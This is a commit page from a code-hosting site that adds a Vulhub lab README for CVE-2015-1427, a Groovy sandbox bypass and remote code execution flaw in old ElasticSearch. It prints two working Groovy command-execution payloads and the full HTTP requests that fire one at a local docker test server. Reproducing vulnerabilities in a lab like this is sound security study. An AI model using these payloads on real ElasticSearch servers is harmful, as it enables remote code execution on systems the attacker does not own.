aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details

Browse Source
This commit is contained in:
Aaron
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

86
elasticsearch/CVE-2015-1427/README.md Normal file
View File

@@ -0,0 +1,86 @@
# ElasticSearch Groovy Sandbox Bypass and Remote Code Execution (CVE-2015-1427)
[中文版本(Chinese version)](README.zh-cn.md)
ElasticSearch is a distributed, RESTful search and analytics engine.
ElasticSearch versions prior to 1.3.8 and 1.4.3 contain a vulnerability in the Groovy scripting engine that allows attackers to bypass the sandbox protection and execute arbitrary code on the server.
After [CVE-2014-3120](../CVE-2014-3120/), ElasticSearch changed its default dynamic scripting language to Groovy and added a sandbox. However, dynamic language execution remained enabled by default. This vulnerability involves:
1. A sandbox bypass
2. A Groovy code execution vulnerability
ElasticSearch supports using "sandboxed" Groovy language as a dynamic scripting engine. However, the sandbox implementation was insufficient. Two methods for command execution were discovered:
1. Lupin's method: Bypass the Java sandbox using reflection
2. Tang3's method: Use Groovy language features to execute commands directly, without using Java
Based on these approaches, we have two different POCs.
Java sandbox bypass method:
```groovy
java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("id").getText()
```
Groovy direct command execution method:
```groovy
def command='id';def res=command.execute().text;res
```
References:
- <http://jordan-wright.com/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/>
- <https://github.com/XiphosResearch/exploits>
- <http://cb.drops.wiki/drops/papers-5107.html>
- <http://cb.drops.wiki/drops/papers-5142.html>
## Environment Setup
Execute the following commands to start a 1.4.2 version ElasticSearch server:
```
docker compose up -d
```
After the server starts, you can access the ElasticSearch server at `http://your-ip:9200`.
## Vulnerability Reproduction
Since querying requires at least one document in the index, first send the following request to add data:
```
POST /website/blog/ HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
{
"name": "test"
}
```
Then send a request containing the payload to execute arbitrary commands:
```
POST /_search?pretty HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 156
{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}
```
The command execution result will be returned in the response:
![](1.png)